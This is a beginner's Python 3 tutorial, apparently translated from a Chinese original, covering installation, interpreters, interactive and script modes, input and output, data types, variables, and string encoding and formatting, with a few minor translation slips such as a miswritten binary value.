If you are using a Mac with OS X>=10.9, the version of Python that comes with the system is 2.7. To install the latest Python 3.8, there are two methods.

Method 1: Download the installer for Python 3.8 from the official Python website, double-click it after downloading and run it and install it.

Method 2: If Homebrew is installed, just install it directly via the command brew install python3.

Installing Python on Linux

If you are using Linux, then I can assume that you have Linux system administration experience and should have no problem installing Python 3 on your own, otherwise, switch back to Windows.

For a large number of students who are currently still using Windows, if you have no plans to switch to a Mac soon, you can continue reading below.

Installing Python on Windows

First, depending on your version of Windows (64-bit or 32-bit), download the 64-bit installer or 32-bit installer, then, run the downloaded exe installer:

Pay special attention to checking Add Python 3.8 to PATH, and then click Install Now to complete the installation.

Run Python

After successful installation, open a command prompt window and type in python, two cases will appear.

Scenario one.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│Python 3.8.x ...                                        │
│[MSC v... 64 bit (AMD64)] on win32                      │
│Type "help", "copyright", "credits" or "license" for mor│
│information.                                            │
│>>> _                                                   │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

Seeing the above screen means that Python was installed successfully!

The fact that you see the prompt >>> means that we are in the Python interactive environment and can type any Python code, and you will get the execution result immediately after entering. Now, type exit() and enter to exit the Python interactive environment (you can also close the command line window directly).

Case 2: You get an error.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│'python' is not recognized as an internal or external co│
│mmand, operable program or batch file.                  │
│                                                        │
│C:\> _                                                  │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

This is because Windows will look for python.exe based on the path set by a Path environment variable, and if it doesn't find it, it will report an error. If you missed checking Add Python 3.8 to PATH during installation, you will have to manually add the path where python.exe is located to the Path.

If you don't know how to change the environment variables, we recommend running the Python installer again, making sure to check Add Python 3.8 to PATH.

Python interpreter

When we write Python code, we get a text file with a .py extension that contains Python code. To run the code, a Python interpreter is needed to execute the .py file.

Since the entire Python language is open source, from the specification to the interpreter, theoretically anyone with a high enough level of proficiency could write a Python interpreter to execute Python code (with great difficulty, of course). In fact, multiple Python interpreters do exist.

CPython

When we download and install Python 3.x from the official Python website, we get an official version of the interpreter directly: CPython. This interpreter is developed in C, hence the name CPython. Running python at the command line is to start the CPython interpreter.

CPython is the most widely used Python interpreter. All the code in the tutorial is also executed under CPython.

IPython

IPython is an interactive interpreter based on CPython. That is, IPython is only enhanced in the way it interacts, but the functionality of executing Python code is exactly the same as CPython. It's like many domestic browsers have different appearances, but the kernel is actually calling IE.

CPython uses >>> as the prompt, while IPython uses In [serial number]: as the prompt.

PyPy

PyPy is another Python interpreter that targets execution speed. PyPy uses JIT technology to dynamically compile (note that it does not interpret) Python code, so it can significantly improve the execution speed of Python code.

The vast majority of Python code will run under PyPy, but PyPy and CPython are somewhat different, which results in the same Python code executing under both interpreters may have different results. If your code is going to be executed under PyPy, you need to understand the differences between PyPy and CPython.

Jython

Jython is a Python interpreter that runs on the Java platform and can compile Python code directly into Java bytecode for execution.

IronPython

IronPython is similar to Jython, except that IronPython is a Python interpreter that runs on Microsoft.

Summary

There are many interpreters for Python, but the most widely used is CPython. If you want to interact with Java or .Net.

All code in this tutorial is guaranteed to run under CPython version 3.x only. Be sure to install CPython locally (that is, download the installer from the official Python website).

First Python program

Before we officially write our first Python program, let's review what command line mode and Python interaction mode are.

Command Line Mode

Select "Command Prompt" in the Windows Start menu to enter command line mode, which has a prompt similar to C:\>.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> _                                                  │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

Python interactive mode

Type the command python in command line mode, you will see a bunch of text output like the following, then you will enter Python interactive mode, its prompt is >>>.

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│Python 3.7 ... on win32                                 │
│Type "help", ... for more information.                  │
│>>> _                                                   │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

By typing exit() and entering in Python interactive mode, you exit Python interactive mode and return to command line mode:

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    - □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python                                             │
│Python 3.7 ... on win32                                 │
│Type "help", ... for more information.                  │
│>>> exit()                                              │
│                                                        │
│C:\> _                                                  │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

You can also select the Python (command line) menu item directly from the Start menu to enter Python interactive mode directly, but the window will close directly after typing exit() and will not return to command line mode.

Once we understand how to start and exit Python's interactive mode, we can officially start writing Python code.

Before writing code, please never paste code from a page to your own computer using "copy"-"paste". In the process of writing code, beginners often make mistakes: incorrect spelling, incorrect capitalization, mixed use of English and Chinese punctuation, mixed use of spaces and tabs, so you need to check and cross-check carefully in order to master how to write programs as fast as possible.

simpson-learn-py3

At the interactive mode prompt >>>, type the code directly and press enter to get the code execution result immediately. Now, try typing 100+200 and see if the calculation results in 300.

>>> 100+200
300

Pretty simple, right? Any valid mathematical calculation will work out.

To get Python to print out the specified text, use the print() function and then enclose the text you wish to print in single or double quotes, but not a mix of single and double quotes:

>>> print('hello, world')
hello, world

This kind of text enclosed in single or double quotes is called a string in the program, and we will encounter it often in the future.

Finally, exit Python with exit() and our first Python program is done! The only downside is that it wasn't saved, so you'll have to type the code again the next time you run it.

Command line mode and Python interactive mode

Please note the distinction between command line mode and Python interactive mode.

In command line mode, you can execute python to enter the Python interactive environment, or you can execute python hello.py to run a .py file.

Executing a .py file can only be executed in command line mode. If you hit the command python hello.py and see the following error.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> python hello.py                                    │
│python: can't open file 'hello.py': [Errno 2] No such   │
│file or directory                                       │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

The error message No such file or directory indicates that hello.py is not found in the current directory, you must first switch the current directory to the directory where hello.py is located in order to execute properly.

┌────────────────────────────────────────────────────────┐
│Command Prompt                                    _ □ x │
├────────────────────────────────────────────────────────┤
│Microsoft Windows [Version 10.0.0]                      │
│(c) 2015 Microsoft Corporation. All rights reserved.    │
│                                                        │
│C:\> cd work                                            │
│                                                        │
│C:\work> python hello.py                                │
│Hello, world!                                           │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

In addition, running a .py file in command-line mode is different from running Python code directly in the Python interactive environment, which automatically prints out the result of each line of Python code, but running Python code directly does not.

For example, in the Python interactive environment, type.

>>> 100 + 200 + 300
600

You can see the result 600 directly.

However, write a calc.py file with the following content.

100 + 200 + 300

Then, in command line mode, execute.

C:\work>python calc.py

Nothing output was found.

This is normal. To output the result, you must print it out yourself with print(). Transform calc.py to.

print(100 + 200 + 300)

Executing it again, you can see the result.

C:\work>python calc.py
600

Finally, the Python interactive mode code is typed one line and executed one line, while the command line mode directly runs the .py file to execute all the code in the file at once. As you can see, Python interactive mode is mainly for debugging Python code and for beginners to learn, it isn't an environment to run Python code officially!

SyntaxError

If SyntaxError is encountered, it means that there is a syntax error in the input Python code. The most common type of syntax error is the use of Chinese punctuation, such as the use of Chinese brackets （ and ）.

>>> print（'hello'）
  File "<stdin>", line 1
    print（'hello'）
         ^
SyntaxError: invalid character '（' (U+FF08)

Or the Chinese quotation marks “ and ” are used.

>>> print(“hello”)
  File "<stdin>", line 1
    print(“hello”)
          ^
SyntaxError: invalid character '“' (U+201C)

When an error occurs, be sure to read the cause of the error. For the above SyntaxError, the interpreter will explicitly state that the cause of the error is the unrecognized character ": invalid character '".

Summary

In Python interactive mode, you can type code directly, then execute it and get the result immediately.

In command line mode, you can run the .py file directly.

Using a text editor

The advantage of writing a program on Python's interactive command line is that you get the result in a single click, but the disadvantage is that you can't save it and you have to knock it again the next time you want to run it.

So, in practice, we always use a text editor to write the code, and when we're done, we save it as a file so that the program can be run again and again.

Now, let's take the last 'hello, world' program and write it in a text editor and save it.

So here's the question: which is the best text editor?

Visual Studio Code!

We recommend Visual Studio Code from Microsoft, it's not the big Visual Studio, it's a streamlined version of Mini Visual Studio, and, Visual Studio Code can be used across! Platforms! Windows, Mac, and Linux universally.

Please note, do not use Word and Windows Notepad. Word saves not plain text files, and Notepad will smartly add a few special characters (UTF-8 BOM) at the beginning of the file, which will result in inexplicable errors in running the program.

With the text editor installed, enter the following code.

print('hello, world')

Note that there should not be any spaces in front of print. Then, select a directory, for example, C:\work, save the file as hello.py, and you can open a command line window, switch the current directory to the directory where hello.py is located, and you can run the program as follows.

C:\work> python hello.py
hello, world

It can also be saved as another name, such as first.py, but it must end with .py, nothing else will work. In addition, the file name can only be a combination of letters, numbers, and underscores.

If there is no hello.py file in the current directory, running python hello.py will report the following error.

C:\Users\IEUser> python hello.py
python: can't open file 'hello.py': [Errno 2] No such file or directory

The error means that the file hello.py cannot be opened because it does not exist. In this case, you have to check whether the file exists in the current directory. If hello.py is stored in another directory, you should first switch to the current directory with the cd command.

Inputs and Outputs

Output

Using print() with a string in parentheses, you can output the specified text to the screen. For example, outputting 'hello, world' is implemented in code as follows.

>>> print('hello, world')

The print() function can also accept multiple strings, separated by a comma ",", which can be concatenated into one string of output.

>>> print('The quick brown fox', 'jumps over', 'the lazy dog')
The quick brown fox jumps over the lazy dog

print() will print each string in turn, and will output a space when it encounters a comma ",", so that the output string is spelled out like this:

print-explain

print() can also print an integer, or the result of a calculation.

>>> print(300)
300
>>> print(100 + 200)
300

Therefore, we can print the result of calculating 100 + 200 a little more nicely as follows.

>>> print('100 + 200 =', 100 + 200)
100 + 200 = 300

Note that for 100 + 200, the Python interpreter automatically calculates the result 300, however, '100 + 200 =' is a string and not a mathematical formula, Python treats it as a string, please interpret the above printout yourself.

Input

Now, you can already output the result you want with print(). But what if you want the user to enter some characters from the computer? Python provides an input() that allows the user to enter a string and store it in a variable. For example, enter the user's name.

>>> name = input()
Michael

Once you type name = input() and hit enter, the Python interactive command line is waiting for your input. At this point, you can type any character you want, then press enter and finish typing.

When you're done, there's no prompt, and the Python interactive command line goes back to >>>. So where does the content we just typed go? The answer is that it is stored in the name variable. You can see the contents of the variable by typing name directly.

>>> name
'Michael'

**What is a variable? **Remind yourself of the basics of algebra learned in junior high school mathematics.

Let the side length of a square be a, then the area of the square is a x a. Thinking of the side length a as a variable, we can calculate the area of the square based on the value of a, e.g.

If a = 2, the area is a x a = 2 x 2 = 4.

If a = 3.5, then the area is a x a = 3.5 x 3.5 = 12.25.

In computer programs, variables can be not only integers or floating point numbers, but also strings, so name as a variable is a string.

To print out the contents of the name variable, in addition to writing name directly and pressing enter, the print() function can be used.

>>> print(name)
Michael

With input and output, we can change the last program that printed hello, world' to something that makes some sense:

name = input()
print('hello,', name)

Running the above program, the first line of code will ask the user to enter any character as his or her name, which will then be stored in the name variable; the second line of code will say hello to the user based on his or her name, for example, enter Michael.

C:\Workspace> python hello.py
Michael
hello, Michael

But the program runs without any prompt message telling the user: "Hey, hurry up and enter your name", which seems very unfriendly. Fortunately, input() allows you to display a string to prompt the user, so we changed the code to:

name = input('please enter your name: ')
print('hello,', name)

Run the program again and you will find that as soon as the program runs, it will first print out please enter your name: so that the user can follow the prompt and enter the name and get the output of hello, xxx as follows:

C:\Workspace> python hello.py
please enter your name: Michael
hello, Michael

Each time you run the program, the output will be different depending on the user input.

At the command line, input and output are just that simple.

Summary

Any computer program is designed to perform a specific task. With input, the user can tell the computer program the information it needs, and with output, the program runs and tells the user the result of the task.

Input is Input and Output is Output, so we refer to input and output collectively as Input/Output, or abbreviated as IO.

input() and print() are the most basic input and output from the command line, but users can also do input and output through other more advanced graphical interfaces, for example, typing your name in a text box on a web page, clicking "OK" and see the output on the web page.

Python Programming Quick Guide - Syntax

https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832

https://docs.python.org/3/tutorial/index.html

Python Basics

Python is a computer programming language. A computer programming language is different from the natural language we use every day. The biggest difference is that natural languages are understood differently in different contexts, and a computer must ensure that the program written in the programming language must not be ambiguous if it is to perform its tasks according to the programming language. Python is no exception.

Python's syntax is relatively simple, indented, and written like the following.

# print absolute value of an integer:
a = 100
if a >= 0:
    print(a)
else:
    print(-a)

Statements starting with # are comments, which are for human eyes and can be anything, and are ignored by the interpreter. Every other line is a statement, and when the statement ends with a colon :, the indented statement is considered a block of code.

Indentation has advantages and disadvantages. The advantage is that it forces you to write formatted code, but there is no rule about whether the indent is a few spaces or a tab. by convention, you should always stick to the 4-spaces indent.

Another advantage of indentation is that it forces you to write less indented code, and you will tend to split a long piece of code into several functions to get less indented code.

The downside of indentation is that the "copy-paste" feature is disabled, which is the worst part. When you refactor your code, the pasted code has to be rechecked for correct indentation. In addition, it's hard for the IDE to format Python code the way it formats Java code.

Finally, be sure to note that Python programs are case-sensitive, and if you write the wrong case, the program will report an error.

Summary

Python uses indentation to organize blocks of code, so be sure to follow the convention and stick to a 4-space indent.

In the text editor, you need to set up the automatic conversion of tabs to 4 spaces to make sure you don't mix tabs and spaces.

Data types and variables

Data types

A computer is, as the name implies, a machine that can do mathematical calculations, so it is logical that computer programs can handle all kinds of numerical values. However, computers can handle much more than just numeric values. They can also handle text, graphics, audio, video, web pages, and a wide variety of other data, and different data requires different data types to be defined. In Python, the data types that can be handled directly are as follows.

integers

Python can handle integers of any size, including negative integers of course, represented in programs exactly as they are written in mathematics, for example: 1, 100, -8080, 0, and so on.

Since computers use binary, it is sometimes easier to represent integers in hexadecimal, which is represented by the 0x prefix and 0-9, a-f, for example: 0xff00, 0xa5b4c3d2, and so on.

For very large numbers, such as 10000000000, it is difficult to count the number of zeros. python allows numbers to be separated by _, so writing 10_000_000_000 is exactly the same as 10000000000. Hexadecimal numbers can also be written as 0xa1b2_c3d4.

floating point numbers

Floating point numbers, also known as decimals, are called floating point numbers because the position of the decimal point of a floating point number is variable when expressed in scientific notation, for example, 1.23x109 is exactly the same as 12.3x108. Floating point numbers can be written mathematically, such as 1.23, 3.14, -9.01, and so on. But for very large or small floating point numbers, they must be expressed in scientific notation, replacing 10 with e. 1.23x109 is 1.23e9, or 12.3e8, 0.000012 can be written as 1.2e-5, and so on.

Integers and floating point numbers are stored differently inside the computer, and integer operations are always exact (is division also exact? Yes!) ), while floating-point operations may have rounding errors.

strings

A string is any text enclosed in single quotes ' or double quotes ", such as 'abc', 'xyz', etc. Note that '' or "" itself is just a representation, not part of a string, so the string 'abc' has only the 3 characters a, b, c. If ' itself is also a character, then it can be enclosed in "", for example, "I'm OK" contains the 6 characters I, ', m, space, O, and K.

What if the string contains both ' and " inside? You can use the escape character \ to identify it, for example.

'I\'m \"OK\"!'

The content of the string represented is:

I'm "OK"!

The escape character \ can escape many characters, such as \n for line feeds, \t for tabs, and the character \ itself should be escaped, so the character represented by \\ is \. You can use print() on Python's interactive command line to print the string to see.

>>> print('I\'m ok.')
I'm ok.
>>> print('I\'m learning\nPython.')
I'm learning
Python.
>>> print('\\\n\\')
\
\

If there are many characters inside the string that need to be escaped, you need to add a lot of \. For simplicity, Python also allows r'' to indicate that the string inside '' is not escaped by default, so you can try it yourself at

>>> print('\\\t\\')
\       \
>>> print(r'\\\t\\')
\\\t\\

If there are many newlines inside the string, it is not good to read them in one line with \n. For simplicity, Python allows to use '''...''' format to represent multiple lines of content, try it yourself:

>>> print('''line1
... line2
... line3''')
line1
line2
line3

The above is typed within the interactive command line, note that when typing multiple lines, the prompt changes from >>> to ..., prompting you to continue typing on the previous line, note that ... is a prompt, not part of the code: `.

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           _ □ x │
├────────────────────────────────────────────────────────┤
│>>> print('''line1                                      │
│... line2                                               │
│... line3''')                                           │
│line1                                                   │
│line2                                                   │
│line3                                                   │
│                                                        │
│>>> _                                                   │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

When the terminator ''' and the brackets ) have been entered, the statement is executed and the result is printed.

If written as a program and saved as a .py file, it would be.

print('''line1
line2
line3''')

The multi-line string '''...''' can also be used with r in front, please test it yourself at:

# -*- coding: utf-8 -*-
print(r'''hello,\n
world''')

Boolean values

Boolean values are identical to the representation of Boolean algebra. A Boolean value has only two values, True, False, either True or False. In Python, a Boolean value can be expressed directly as True, False (please note the case), or it can be calculated by Boolean operations as follows.

>>> True
True
>>> False
False
>>> 3 > 2
True
>>> 3 > 5
False

Boolean values can be operated on with and, or and not.

The and operation is a sum operation, and the result of the and operation is True only if all are True.

>>> True and True
True
>>> True and False
False
>>> False and False
False
>>> 5 > 3 and 3 > 1
True

The or operation is an or operation, and as long as one of them is True, the result of the or operation is True.

>>> True or True
True
>>> True or False
True
>>> False or False
False
>>> 5 > 3 or 1 > 3
True

The not operation is a non-operation; it is a monadic operator that turns True into False and False into True.

>>> not True
False
>>> not False
True
>>> not 1 > 2
True

Boolean values are often used in conditional judgments, e.g.

if age >= 18:
    print('adult')
else:
    print('teenager')

Null values

A null value is a special value in Python, denoted by None. None cannot be interpreted as 0, because 0 is meaningful, and None is a special null value.

In addition, Python provides a variety of data types, such as lists and dictionaries, and also allows the creation of custom data types, which we will continue to talk about later.

Variables

The concept of a variable is basically the same as the equation variable in middle school algebra, except that in computer programs, variables can be not only numbers, but also arbitrary data types.

Variables are represented in the program by a variable name, which must be a combination of upper and lower case English, numbers, and _, and cannot start with a number, for example.

a = 1

The variable a is an integer.

t_007 = 'T007'

The variable t_007 is a string.

Answer = True

The variable Answer is a Boolean value True.

In Python, the equal sign = is an assignment statement that can assign any data type to a variable, the same variable can be assigned repeatedly, and it can be a different type of variable, for example.

# -*- coding: utf-8 -*-
a = 123 # a is an integer
print(a)
a = 'ABC' # a becomes a string
print(a)

This type of language where the type of the variable itself is not fixed is called a dynamic language, and its counterpart is a static language. Static languages must specify the variable type when defining a variable, and will report an error if the type does not match when assigning a value. For example, Java is a static language, and the assignment statement is as follows (// indicates a comment)

int a = 123; // a is an integer type variable
a = "ABC"; // Error: You cannot assign a string to an integer variable

Dynamic languages are more flexible compared to static languages for this reason.

Please don't equate the equal sign of an assignment statement with the equal sign of mathematics. For example, the following code.

x = 10
x = x + 2

If you understand x = x + 2 mathematically, that is not true anyway. In the program, the assignment statement first calculates the expression x + 2 on the right side, gets the result 12, and then assigns it to the variable x. Since the previous value of x was 10, after reassignment, the value of x becomes 12.

Finally, it is also important to understand how variables are represented in computer memory. When we write:

a = 'ABC'

Here the Python interpreter does two things.

creates a string 'ABC' in memory.
creates a variable named a in memory and points it to 'ABC'.

It is also possible to assign a variable a to another variable b, an operation that actually points the variable b to the data pointed to the variable a, as in the following code.

# -*- coding: utf-8 -*-
a = 'ABC'
b = a
a = 'XYZ'
print(b)

Is the last line printing out the contents of variable b as 'ABC' or as 'XYZ'? If understood in a mathematical sense, one would incorrectly conclude that b is the same as a and should also be 'XYZ', but in fact, the value of b is 'ABC', so let's execute the code line by line to see what is really happening.

Executing a = 'ABC', the interpreter creates the string 'ABC' and the variable a, and points a to 'ABC'.

py-var-code-1

Executing b = a, the interpreter creates the variable b and points b to the string 'ABC' pointed to by a.

py-var-code-2

Executing a = 'XYZ', the interpreter creates the string XYZ' and changes the pointing of ato'XYZ', but b` does not change.

py-var-code-3

So, the final result of printing the variable b will naturally be 'ABC'.

Constants

A constant is a variable that cannot be changed, for example, the common mathematical constant π is a constant. In Python, constants are usually represented by all-caps variable names.

PI = 3.14159265359

But the fact is that PI is still a variable, and Python has no mechanism at all to ensure that PI won't be changed, so using all-caps variable names for constants is just a customary usage, and if you must change the value of the variable PI, no one can stop you.

Finally, an explanation of why division by integers is also exact. In Python, there are two kinds of division, one of which is /.

>>> 10 / 3
3.3333333333333335

/ The result of the division calculation is a floating point number, even if two integers are exactly divisible, and the result is a floating point number.

>>> 9 / 3
3.0

Another type of division is //, called floor division, where the division of two integers remains an integer:

>>> 10 // 3
3

You read that right, the floor of an integer divided by // is always an integer, even if the division is not exhaustive. To do exact division, use / and you're done.

Because // division takes only the integer part of the result, Python also provides a remainder operation that gives you the remainder of the division of two integers by.

>>> 10 % 3
1

Whether an integer does // division or takes a remainder, the result is always an integer, so the result of integer arithmetic is always exact.

Summary

Python supports a variety of data types, and within the computer, any data can be thought of as an "object", and variables are used in programs to point to these data objects.

Assigning x = y to a variable is to point the variable x to the real object that the variable y points to. Subsequent assignments to the variable y do not affect the pointing of the variable x.

Note: Python's integers have no size limit, while some languages have size limits for integers based on their storage length, for example, Java limits 32-bit integers to -2147483648-2147483647.

Python's floating point numbers also have no size limit, but beyond a certain range, they are directly represented as inf (infinity).

String and encoding

Character encoding

As we have already talked about, strings are also a data type, but what is special about strings is that there is also an encoding problem.

Because computers can only process numbers, if you want to process text, you must first convert the text to numbers before you can process it. The earliest computers were designed with 8 bits (bit) as a byte (byte), so the largest integer that a byte can represent is 255 (binary 1111111111 = decimal 255), and to represent larger integers, more bytes must be used. For example, the largest integer that can be represented by two bytes is 65535 and the largest integer that can be represented by four bytes is 4294967295.

Since the computer was invented by the Americans, only 127 characters were first encoded into the computer, that is, upper and lower case English letters, numbers and some symbols, this code table is called ASCII code, for example, the code for upper case letter A is 65 and the code for lower case letter z is 122.

But to deal with Chinese, obviously, one byte is not enough, at least two bytes are needed, and it should not conflict with ASCII, so China has developed GB2312 encoding, which is used to encode Chinese.

As you can imagine, there are hundreds of languages in the world, Japan coded Japanese into Shift_JIS, Korea coded Korean into Euc-kr, and each country has its own standard, so there will be inevitable conflicts, and as a result, there will be garbled codes in the mixed text of multiple languages.

char-encoding-problem

As a result, the Unicode character set was created. Unicode unifies all languages into one set of encodings so that there will be no more problems with garbled code.

The Unicode standard has evolved, but the most commonly used is the UCS-16 encoding, which uses two bytes to represent a character (four bytes are needed if very remote characters are to be used). Unicode is directly supported by modern operating systems and most programming languages.

Now, run through the differences between ASCII and Unicode encoding: ASCII encoding is 1 byte, while Unicode encoding is usually 2 bytes.

The letter A is 65 in decimal and 01000001 in binary with ASCII encoding.

The character 0 in ASCII encoding is 48 in decimal and 00110000 in binary, noting that the character '0' is different from the integer 0.

The Chinese character 中 is beyond the scope of ASCII encoding and is 20013 in decimal and 01001110 00101101 in binary using Unicode encoding.

You can guess that if you encode the ASCII-encoded A in Unicode, you just need to make up the 0 in front of it, so the Unicode encoding of A is 00000000 01000001.

A new problem arises again: if you unify it into Unicode, the messy code problem disappears from now on. However, if all the text you write is basically in English, Unicode encoding requires twice as much storage space as ASCII encoding, which is very uneconomical in terms of storage and transmission.

Therefore, in the spirit of saving, UTF-8 encoding, which converts Unicode encoding into variable-length encoding, has emerged. Only very rare characters are encoded as 4-6 bytes. If the text you are transferring contains a large number of English characters, using UTF-8 encoding saves space.

Encoding	ASCII	Unicode	UTF-8
A	01000001	00000000 01000001	01000001
中	x	01001110 00101101	11100100 10111000 10101101

From the table above, you can also find that UTF-8 encoding has the added benefit that ASCII encoding can actually be seen as part of UTF-8 encoding, so a large amount of legacy software that only supports ASCII encoding can continue to work under UTF-8 encoding.

Having figured out the relationship between ASCII, Unicode and UTF-8, we can summarize the way character encoding works in common for computer systems nowadays.

In the computer memory, Unicode encoding is used uniformly, and when it needs to be saved to the hard disk or needs to be transferred, it is converted to UTF-8 encoding.

When editing with Notepad, UTF-8 characters read from a file are converted to Unicode characters in memory, and when editing is complete, Unicode is converted to UTF-8 and saved to the file when saving.

rw-file-utf-8

When browsing the web, the server converts the dynamically generated Unicode content to UTF-8 before transferring it to the browser.

web-utf-8

So you see a lot of web pages with something like <meta charset="UTF-8" /> on the source code, indicating that the page is encoded exactly in UTF-8.

Python's strings

With the headache of character encoding out of the way, let's look at Python strings.

In the latest version of Python 3, strings are encoded in Unicode, meaning that Python's strings support multiple languages, such as

>>> print('包含中文的str')
包含中文的str

For the encoding of individual characters, Python provides the ord() function to obtain an integer representation of the character, and the chr() function to convert the encoding to the corresponding character:

>>> ord('A')
65
>>> ord('中')
20013
>>> chr(66)
'B'
>>> chr(25991)
'文'

If you know the integer encoding of the characters, you can also write str in hexadecimal like this.

>>> '\u4e2d\u6587'
'中文'

The two ways of writing are exactly equivalent.

Since Python's string type is str, represented in memory as Unicode, a character corresponds to a number of bytes. If you want to transfer it over the network or save it to disk, you need to change str to bytes in bytes.

Python represents data of type bytes in single or double quotes prefixed with b as follows.

x = b'ABC'

Be careful to distinguish between 'ABC', which is str, and b'ABC', which occupies only one byte for each character of bytes, although the content is displayed the same as the former.

The str in Unicode can be encoded to the specified bytes by the encode() method, e.g.

>>> 'ABC'.encode('ascii')
b'ABC'
>>> '中文'.encode('utf-8')
b'\xe4\xb8\xad\xe6\x96\x87'
>>> '中文'.encode('ascii')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)

Pure English str can be encoded with ASCII as bytes, the content is the same, and str containing Chinese can be encoded with UTF-8 as bytes. The str containing Chinese cannot be encoded with ASCII because the Chinese encoding range exceeds the range of ASCII encoding, Python will report an error.

In bytes, bytes that cannot be displayed as ASCII characters are displayed with \x##.

Conversely, if we read a stream of bytes from the network or from a disk, the data read is bytes. To change bytes to str, the decode() method is used.

>>> b'ABC'.decode('ascii')
'ABC'
>>> b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
'中文'

If bytes contains bytes that cannot be decoded, the decode() method will report an error.

>>> b'\xe4\xb8\xad\xff'.decode('utf-8')
Traceback (most recent call last):
  ...
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 3: invalid start byte

If there are only a small number of invalid bytes in bytes, you can pass errors='ignore' to ignore the erroneous bytes.

>>> b'\xe4\xb8\xad\xff'.decode('utf-8', errors='ignore')
'中'

To calculate how many characters str contains, you can use the len() function.

>>> len('ABC')
3
>>> len('中文')
2

The len() function counts the number of characters in str, if replaced with bytes, the len() function counts the number of bytes.

>>> len(b'ABC')
3
>>> len(b'\xe4\xb8\xad\xe6\x96\x87')
6
>>> len('中文'.encode('utf-8'))
6

As you can see, 1 Chinese character will usually occupy 3 bytes after UTF-8 encoding, while 1 English character will occupy only 1 byte.

When manipulating strings, we often encounter the interconversion of str and bytes. To avoid garbling problems, you should always use UTF-8 encoding for str and bytes conversions.

Since Python source code is also a text file, when your source code contains Chinese, be sure to specify saving as UTF-8 when you save the source code. When the Python interpreter reads the source code, in order for it to read it in UTF-8, we usually write these two lines at the beginning of the file.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

the first line comment is to tell the Linux/OS X system that this is a Python executable and that Windows systems will ignore the comment.

The second comment line is to tell the Python interpreter to read the source code in UTF-8 encoding, otherwise, the Chinese output you write in the source code may be garbled.

Asserting UTF-8 encoding does not mean that your .py file is UTF-8 encoded; you must and do make sure that the text editor is using UTF-8 without BOM encoding.

set-encoding-in-notepad++

If the .py file itself uses UTF-8 encoding and also declares # -*- coding: utf-8 -*-, opening a command prompt to test will display Chinese properly.

py-chinese-test-in-cmd

Formatting

The last common problem is how to output a formatted string. We often output something like 'Hello dear xxx! Your phone bill for month xx is xx and your balance is xx' and strings like that, and the contents of xxx are changing based on variables, so an easy way to format strings is needed.

py-str-format

In Python, the formatting used is the same as in C, implemented with %, as an example.

>>> 'Hello, %s' % 'world'
'Hello, world'
>>> 'Hi, %s, you have $%d.' % ('Michael', 1000000)
'Hi, Michael, you have $1000000.'

As you may have guessed, the % operator is used to format strings. Inside a string, %s means replace with a string, %d means replace with an integer, and there are several %? placeholder, followed by several variables or values, the order should correspond well. If there is only one %? , the parentheses can be omitted.

Common placeholders are.

Placeholders	Replacement Content
%d	Integer
%f	Float
%s	String
%x	Hex Integer

Among other things, formatting integers and floating-point numbers also allows you to specify whether to complement zeros and the number of integer and fractional digits.

# -*- coding: utf-8 -*-
print('%2d-%02d' % (3, 1))
print('%.2f' % 3.1415926)

If you're not quite sure what to use, %s always works, and it will convert any data type to a string: the

>>> 'Age: %s. Gender: %s' % (25, True)
'Age: 25. Gender: True'

There are times when the % inside a string is a normal character. This time it is necessary to escape it and use %% to represent a %.

>>> 'growth rate: %d %%' % 7
'growth rate: 7 %'

format()

Another way to format a string is to use the string's format() method, which will replace the placeholders {0}, {1} ...... within the string in order with the passed arguments, although this is much more cumbersome to write than %:.

>>> 'Hello, {0}, 成绩提升了 {1:.1f}%'.format('小明', 17.125)
'Hello, 小明, 成绩提升了 17.1%'

f-string

The last way to format strings is to use strings starting with f, called f-string, which differs from normal strings in that strings that contain {xxx} are replaced with the corresponding variable:

>>> r = 2.5
>>> s = 3.14 * r ** 2
>>> print(f'The area of a circle with radius {r} is {s:.2f}')
The area of a circle with radius 2.5 is 19.62

In the above code, {r} is replaced by the value of the variable r, {s:.2f} is replaced by the value of the variable s, and the .2f after : specifies the formatting parameter (i.e., two decimal places are retained), so the result of the replacement of {s:.2f} is 19.62.

Summary

Python 3's strings use Unicode, which directly supports multiple languages.

